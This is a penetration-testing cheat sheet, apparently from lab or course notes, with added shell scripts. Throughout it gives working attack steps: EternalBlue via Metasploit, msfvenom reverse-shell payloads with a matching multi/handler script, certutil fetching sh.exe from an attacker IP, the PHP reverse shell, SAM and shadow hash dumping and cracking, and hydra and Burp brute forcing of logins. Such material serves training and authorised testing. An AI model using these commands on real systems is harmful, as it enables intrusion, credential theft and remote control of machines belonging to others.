- smbclient -L //$ipanswer -N
- – add a share after the host: smbclient //$ipanswer/tmp or //$ipanswer/ADMINS
- – attempts to connect over SMB (forward slashes avoid having to escape backslashes in the shell)
- – try no password first (-N = null session), then guest or any creds you already have with -U user
- enum4linux
- – enum4linux -a 10.10.14.36 | tee enum4linux.log.txt
- – this often errors out or hangs partway on newer targets, but it’s cheap to try; enum4linux-ng is the maintained rewrite
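Added example (not from the original notes): the share table that smbclient -L prints can be parsed and fed straight back into per-share null-session attempts, so nothing in the list gets skipped. The listing below is constructed sample output in the Samba format (real output indents with tabs; the awk patterns accept tabs or spaces), and 10.10.14.36 is just the IP the notes use.

```shell
#!/usr/bin/env bash
# Added example: parse `smbclient -L` output into follow-up smbclient commands.
# SAMPLE_LISTING is constructed, not captured from a real host.
set -eu

SAMPLE_LISTING='
    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    tmp             Disk      oh noes!
    opt             Disk      
    IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
    ADMINS          Disk      admin stuff
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            DC01
'

# parse_shares: share names from the Sharename table on stdin, one per line.
parse_shares() {
    awk '/Sharename[ \t]+Type/ { in_table=1; next }
         in_table && /^[ \t]*-+/ { next }      # dashed header underline
         in_table && NF==0 { exit }            # blank line ends the table
         in_table && !/^[ \t]/ { exit }        # "Reconnecting..." ends it too
         in_table { print $1 }'
}

# disk_shares: drop IPC$ (no files) and print$ (printer drivers), keep the rest.
disk_shares() {
    grep -v -e '^IPC\$$' -e '^print\$$' || true
}

# share_commands HOST: one null-session listing command per share on stdin.
share_commands() {
    while IFS= read -r share; do
        printf "smbclient //%s/%s -N -c 'ls'\n" "$1" "$share"
    done
}

printf '%s\n' "$SAMPLE_LISTING" | parse_shares | disk_shares | share_commands 10.10.14.36
```

Pipe real output in with `smbclient -L //$ipanswer -N | parse_shares | disk_shares | share_commands $ipanswer`; the emitted lines are the commands to run, so nothing touches the target until you choose to.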
- unshadow
- – copy the target’s /etc/passwd and /etc/shadow – paste each into a local text file
- – unshadow passwd shadow > unshadowed.txt – joins them into crackable lines – feed to hashcat (-m 1800 for $6$ sha512crypt, -m 500 for $1$ md5crypt) or john
- hashdump (meterpreter)
- – once pwned (needs SYSTEM), use hashdump to dump the SAM – the NT hashes go to hashcat -m 1000
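Added example (not from the original notes) covering both the unshadow step and the hashdump step above: a minimal unshadow in awk, a filter that drops locked accounts, a helper that picks the hashcat mode from the hash prefix, and an extractor for the NT hash out of meterpreter hashdump lines. The passwd, shadow and hashdump contents are constructed with fake hashes (the NT value is the well-known hash of the empty password); the hashcat mode numbers are hashcat’s own.

```shell
#!/usr/bin/env bash
# Added example: unshadow + hashcat mode selection + hashdump NT extraction.
# All input files below are constructed samples, not data from a real host.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kay:x:1000:1000:Kay:/home/kay:/bin/bash
jan:x:1001:1001:Jan:/home/jan:/bin/bash
EOF
cat > "$WORK/shadow" <<'EOF'
root:$6$saltsalt$FAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASHFAKEHASH:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
kay:$1$abcdefgh$FAKEHASHFAKEHASHFAKEHASHFA:18000:0:99999:7:::
jan:!:18000:0:99999:7:::
EOF
# meterpreter hashdump format: user:rid:LMhash:NThash:::
cat > "$WORK/hashdump.txt" <<'EOF'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EOF

# unshadow_join PASSWD SHADOW: replace the "x" password field with the real hash,
# producing the same line format the unshadow tool does.
unshadow_join() {
    awk -F: 'NR==FNR { hash[$1]=$2; next }
             ($1 in hash) { $2=hash[$1] } { print }' OFS=: "$2" "$1"
}

# crackable_only: keep lines whose hash field is a real crypt hash (drops *, !, !!, empty).
crackable_only() {
    awk -F: '$2 ~ /^\$/'
}

# hashcat_mode HASH: map the crypt(3) prefix to the hashcat -m number.
hashcat_mode() {
    case "$1" in
        '$1$'*)        echo 500  ;;   # md5crypt
        '$5$'*)        echo 7400 ;;   # sha256crypt
        '$6$'*)        echo 1800 ;;   # sha512crypt
        '$2'[aby]'$'*) echo 3200 ;;   # bcrypt
        '$y$'*)        echo "yescrypt: use john, hashcat has no mode" ;;
        *)             echo unknown ;;
    esac
}

# nt_hashes HASHDUMP: user:NThash lines for hashcat -m 1000
nt_hashes() {
    awk -F: '{ print $1 ":" $4 }' "$1"
}

unshadow_join "$WORK/passwd" "$WORK/shadow" | crackable_only > "$WORK/unshadowed.txt"
cat "$WORK/unshadowed.txt"
echo "root -> hashcat -m $(hashcat_mode "$(awk -F: '$1=="root"{print $2}' "$WORK/unshadowed.txt")")"
nt_hashes "$WORK/hashdump.txt"
```

Dropping the locked accounts before cracking matters with hashcat, which rejects a file containing `*` or `!` entries as malformed hashes; the real unshadow tool leaves them in.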
- "Win 7 7601 SP1" (Windows 7 build 7601, Service Pack 1) in a scan is a dead giveaway for MS17-010 (EternalBlue) on SMB
- – use msfconsole (metasploit), search ms17-010
- – use auxiliary/scanner/smb/smb_ms17_010 – confirms the host is vulnerable before you exploit it
- – set the usual options (RHOSTS, LHOST, LPORT); then use exploit/windows/smb/ms17_010_eternalblue
- – set payload windows/x64/meterpreter/reverse_tcp
- – type set payload windows/ and hit tab to see more
- – can also google "AutoBlue" (AutoBlue-MS17-010 on GitHub) for a standalone Python version
- dirbuster &
- – this GUI uses a wordlist to find directories (the & backgrounds it so the terminal stays free)
- – dirb and gobuster are command-line alternatives
- – depending on the stack, specify the file extensions to look for
- – .asp, .aspx, .php, .txt, .zip, .bak, .rar… etc
- gobuster
- – gobuster dir -u http://10.10.14.36 -w /opt/DirBuster-0.12/directory-list-2.3-medium.txt -x php,txt
- – just like dirb or dirbuster; current gobuster needs the dir subcommand (dns and vhost are the others)
- dirsearch
- $ dirsearch -u http://<target_IP>:<port> -e php -x 400,404
- – -e sets the extensions to try, -x hides responses with those status codes
- find
- $ find / -perm -4000 -type f -exec ls -ld {} \; 2>/dev/null
- this is good to find files with the SUID bit set (-perm -4000); 2>/dev/null hides the permission-denied noise
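Added example (not from the original notes): the find command above returns every SUID file, most of which are stock binaries, so the useful step is to diff the result against a baseline and only chase what is unusual. The baseline here is an assumed, shortened list of binaries that are normally SUID on a Debian/Ubuntu-style box, not an authoritative one; build your own from a clean install of the target’s distro. The SUID files it scans are created in a temp directory so the block runs anywhere.

```shell
#!/usr/bin/env bash
# Added example: find SUID files and flag the ones not in a known baseline.
# BASELINE is an assumed list; the scanned files are constructed in a temp dir.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

BASELINE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec'
BASELINE_FILE="$WORK/baseline.txt"
printf '%s\n' "$BASELINE" > "$BASELINE_FILE"

# Constructed fake filesystem: one expected SUID binary, one unexpected, one plain file.
mkdir -p "$WORK/usr/bin" "$WORK/opt/app"
printf '#!/bin/sh\n' > "$WORK/usr/bin/passwd"; chmod 4755 "$WORK/usr/bin/passwd"
printf '#!/bin/sh\n' > "$WORK/opt/app/helper";  chmod 4755 "$WORK/opt/app/helper"
printf 'notes\n'     > "$WORK/opt/app/README";  chmod 0644 "$WORK/opt/app/README"

# find_suid ROOT: the notes' find, scoped to ROOT, paths only (ls -ld is for eyeballing).
find_suid() {
    find "$1" -perm -4000 -type f 2>/dev/null
}

# flag_unexpected: paths on stdin that are not an exact line in the baseline.
# -F fixed strings, -x whole line, -v invert, -f patterns from file.
flag_unexpected() {
    grep -Fvxf "$BASELINE_FILE" || true
}

# Strip the temp prefix so paths compare against the baseline as they would on a real box.
find_suid "$WORK" | sed "s#^$WORK##" | flag_unexpected
```

On a live target the pipeline is simply `find / -perm -4000 -type f 2>/dev/null | flag_unexpected`; anything it prints is what you look up for a known privilege-escalation path, and a stock binary that appears only because your baseline came from a different distro is a false positive you can rule out quickly.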
- ftp $ipanswer
- – try as anonymous (any password)
- – try putting a file somewhere writable
- – put dog.jpg
- – if the FTP root is also the web root, use msfvenom to create a payload and upload it…
- msfvenom -p windows/meterpreter/reverse_tcp
- – LHOST=<attacker_IP> LPORT=4444 -f aspx > ex.aspx
- – LHOST=<attacker_IP> LPORT=4444 -f exe > sh.exe
- – LHOST=<attacker_IP> LPORT=4444 -f war > shell.war (for Tomcat; if the Tomcat host is Linux, use -p java/jsp_shell_reverse_tcp instead)
- – 32 or 64 bit system matters… use windows/x64/meterpreter/reverse_tcp for a 64-bit target
- – -p is for payload, -f is for the output file format (msfvenom --list formats shows them all)
- – put using ftp, or upload through a vulnerable page
- – msfconsole – use exploit/multi/handler to listen for the connection
- – set payload windows/meterpreter/reverse_tcp (must match what msfvenom built, including x64)
- – run on vulnerable machine – http://$ipanswer/ex.aspx
- – match the format to what the target will execute (.aspx for IIS, .war for Tomcat, .exe for a Windows host, etc…)
- – netcat (nc -nvlp 4444) only catches stageless shell payloads such as windows/shell_reverse_tcp; staged meterpreter needs multi/handler to send the second stage
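Added example (not from the original notes): the steps above only work when the payload baked into the file, the architecture, the listener type and the handler’s options all agree, so it helps to generate the msfvenom command and the handler resource script from one set of inputs. This script does that and refuses the one combination that silently fails (staged meterpreter against a plain netcat listener). The IP and ports are placeholders taken from the notes; nothing is executed against a target, and msfvenom itself is not invoked.

```shell
#!/usr/bin/env bash
# Added example: build a matching msfvenom command and multi/handler .rc file.
# IP/port values are placeholders; the script only prints commands and files.
set -eu

# pick_payload ARCH KIND LISTENER -> metasploit payload name
#   ARCH: x86|x64   KIND: meterpreter|shell   LISTENER: msf|nc
# Stageless payloads use the single-underscore form (shell_reverse_tcp) and can
# be caught by netcat; staged ones (shell/reverse_tcp, meterpreter/reverse_tcp)
# need exploit/multi/handler to deliver stage two.
pick_payload() {
    arch_prefix=windows/
    [ "$1" = x64 ] && arch_prefix=windows/x64/
    case "$2/$3" in
        meterpreter/msf) echo "${arch_prefix}meterpreter/reverse_tcp" ;;
        meterpreter/nc)  echo "error: meterpreter is staged, use multi/handler not nc" >&2; return 1 ;;
        shell/msf)       echo "${arch_prefix}shell/reverse_tcp" ;;
        shell/nc)        echo "${arch_prefix}shell_reverse_tcp" ;;
        *)               echo "error: unknown kind/listener $2/$3" >&2; return 1 ;;
    esac
}

# venom_cmd PAYLOAD LHOST LPORT FORMAT OUTFILE -> the msfvenom command line
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' "$1" "$2" "$3" "$4" "$5"
}

# handler_rc PAYLOAD LHOST LPORT -> resource script for `msfconsole -r handler.rc`
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j -z
EOF
}

# Example: 64-bit meterpreter in an .aspx for IIS, caught by multi/handler.
PAYLOAD=$(pick_payload x64 meterpreter msf)
venom_cmd "$PAYLOAD" 10.10.14.36 4444 aspx ex.aspx
RC_FILE=$(mktemp)
handler_rc "$PAYLOAD" 10.10.14.36 4444 > "$RC_FILE"
cat "$RC_FILE"
rm -f "$RC_FILE"
```

`ExitOnSession false` with `exploit -j -z` keeps the handler listening in the background after the first shell connects, which is what you want when the same ex.aspx may get triggered more than once; for a netcat listener, pick `shell nc` and run the printed msfvenom command as is.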
- background (metasploit)
- – if there’s an open connection, you can background the session (background, or Ctrl-Z) and use other modules
- – get back to it with sessions -i <#>; post modules are pointed at it with set SESSION <#>
- suggester (metasploit)
- – use post/multi/recon/local_exploit_suggester
- – set SESSION to the backgrounded session number, then run
- meterpreter
- – set lhost tun0 – easy way of saying set LHOST=<your VPN IP> (msfconsole resolves the interface name)
- – common commands once on a system (meterpreter):
- – getuid
- – sysinfo
- – pwd
- – shell – drops to an OS shell for the rest:
- – history
- – whoami
- – ls -alh
- – uname -a
- – look for scripts online called "LinEnum.sh" and "linuxprivchecker.py"
- – touch – create a file (quick test of whether a directory is writable)
- – getsystem (Windows, from an admin shell: tries several techniques to get SYSTEM)
- – migrate (move into a longer-lived process such as explorer.exe before the current one dies)
- netcat – nc -nvlp 4444
- – a listener waiting for a payload to call back
- – use a stageless payload such as windows/shell_reverse_tcp and wait; the staged windows/shell/reverse_tcp expects the metasploit handler to send its second stage and will not give a shell in netcat
- BurpSuite
- – [PROXY TAB] –> [OPTIONS TAB] – shows the listener (127.0.0.1:8080) that intercepts traffic
- – Browser –> manual proxy –> 127.0.0.1 –> port 8080 –> all protocols
- – Burpsuite – turn intercept on and off
- – use the "Forward" button to release the request and see the page reload
- – right click on requests/responses –> send to TOOLS as needed
- – REPEATER, INTRUDER, DECODER – some of the other tools
- – Brute Force (INTRUDER) – highlight the part of the request to vary and Add § it as a payload position
- – [PAYLOADS TAB] – put the list into ‘Payload Options [Simple list]’
- – uncheck URL-encode at the bottom of the page (otherwise the = padding in base64 becomes %3d and the header breaks)
- – click Start Attack – sort by status code or response length to spot the one that worked
- bash scripting
- – use to convert a list to Base64, e.g. for Basic-auth brute forcing
- – echo -n 'tomcat:tomcat' | base64 (this converts to base64; -n drops the newline, which would otherwise be encoded too)
- – example: while read -r cred; do echo -n "$cred" | base64; done < tomcat.txt (read keeps a password with spaces on one line, unlike for x in $(cat …))
- – common commands:
- – arp -a
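Added example (not from the original notes): the loop above, carried through to what Intruder actually sends. It reads a user:pass list, emits one base64 payload per line, shows the full Authorization header form, and decodes a value back to confirm that what is being tried is what you think it is. The credential list is constructed here; tomcat.txt is just the filename the notes use.

```shell
#!/usr/bin/env bash
# Added example: user:pass list -> base64 payloads for a Basic-auth Intruder run.
# tomcat.txt below is constructed sample input.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

cat > "$WORK/tomcat.txt" <<'EOF'
tomcat:tomcat
admin:admin
tomcat:s3cret
role1:tomcat
EOF

# b64_creds FILE: one base64 line per credential.
# `while read` (not `for x in $(cat ...)`) keeps a password with spaces intact;
# printf '%s' (like echo -n) keeps the trailing newline out of the encoding;
# the `|| [ -n "$cred" ]` also handles a last line with no newline.
b64_creds() {
    while IFS= read -r cred || [ -n "$cred" ]; do
        [ -z "$cred" ] && continue
        printf '%s' "$cred" | base64
    done < "$1"
}

# basic_header VALUE: the header exactly as it appears in the request.
basic_header() {
    printf 'Authorization: Basic %s\n' "$1"
}

# b64_decode VALUE: reverse the encoding to verify a payload line.
b64_decode() {
    printf '%s' "$1" | base64 -d
}

b64_creds "$WORK/tomcat.txt" > "$WORK/payloads.txt"   # paste into Payload Options, URL-encode unchecked
cat "$WORK/payloads.txt"
basic_header "$(head -n 1 "$WORK/payloads.txt")"
b64_decode "$(head -n 1 "$WORK/payloads.txt")"; echo
```

If a payload line decodes to something with a trailing newline or a stray space, the server will reject a correct password; decoding one line before starting the attack catches that.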
- SimpleHTTPServer
- – python -m SimpleHTTPServer 80 (python2) or python3 -m http.server 80
- – serves the current directory so the target can wget/curl your files
- – Windows has no wget by default, but certutil or PowerShell can do the equivalent
- Wget for Windows:
- – c:\Users\Administrator\Desktop\flags> add the command after this prompt
- – certutil -urlcache -f http://<attacker_IP>/sh.exe c:\users\administrator\desktop\flags\sh.exe
- – once in a shell, run sh.exe to reach out to your listener
- Wappalyzer – browser extension
- – install for enumeration of the web stack (CMS, framework, server and library versions)
- fuzzysecurity.com
- – the bible of Windows priv esc (Windows Privilege Escalation Fundamentals)
- psexec.py / wmiexec.py / smbexec.py (impacket)
- – psexec.py pentest:'P3nT3st!'@10.10.10.152
- – located in the /opt/impacket/ folder (examples/)
- – installed with git clone, and then pip install .
- – this was shown on the TCM course
- – good when you’re up against antivirus, and worth trying before meterpreter (more detectable); psexec.py drops a service binary on the target, wmiexec.py runs over WMI without dropping one
- linpeas.sh
- – ./linpeas.sh | tee linpeas.log.txt
- – a great script to check a machine from the inside
- – look for red/yellow (how linpeas highlights likely priv esc vectors)
- GitHub Suggester (windows-exploit-suggester)
- – python windows-exploit-suggester.py --update first to pull the latest mssb.xls, then:
- – python windows-exploit-suggester.py --database mssb.xls --systeminfo sysinfo.txt
- – look for Sherlock (deprecated now) or Watson to do the same job from inside the shell
- – syntax is on the GitHub site
- – the sysinfo was gotten after shell access; type systeminfo and save the output as sysinfo.txt
- PHP-Reverse-Shell
- – put this on a computer you have access to upload to (the web server has to execute .php)
- – you’ll probably have to google for it (pentestmonkey’s php-reverse-shell is the popular one), and it’s easy
- – change the $ip and $port options to your listener
- – python -m SimpleHTTPServer 80 – to serve the reverse shell if the target has to fetch it
- – make sure you set up netcat first (nc -nvlp 4444), then browse to the uploaded file
- Spawn a TTY shell
- – sometimes a netcat shell has no TTY (no tab completion, su/sudo complain about the terminal)
- – google Spawning a TTY Shell
- – netsec is a great resource for this (google results)
- – example: python -c 'import pty; pty.spawn("/bin/bash")' (or python3)
- – then Ctrl-Z, stty raw -echo; fg, and export TERM=xterm for a fully usable terminal
- hydra
- – hydra -l jan -P /opt/rockyou.txt ssh://10.10.14.36
- – this will brute force a service like ssh or ftp (-l one user, -L user list; -p one password, -P password list)
- JohnTheRipper
- – /opt/JohnTheRipper/run/ssh2john.py kay_id_rsa > forjohn.txt
- – /opt/JohnTheRipper/run/john forjohn.txt --wordlist=/opt/rockyou.txt
- – will need to convert the item to a format that john can use
- – this one uses ssh2john… there’s also zip2john, rar2john, keepass2john, etc…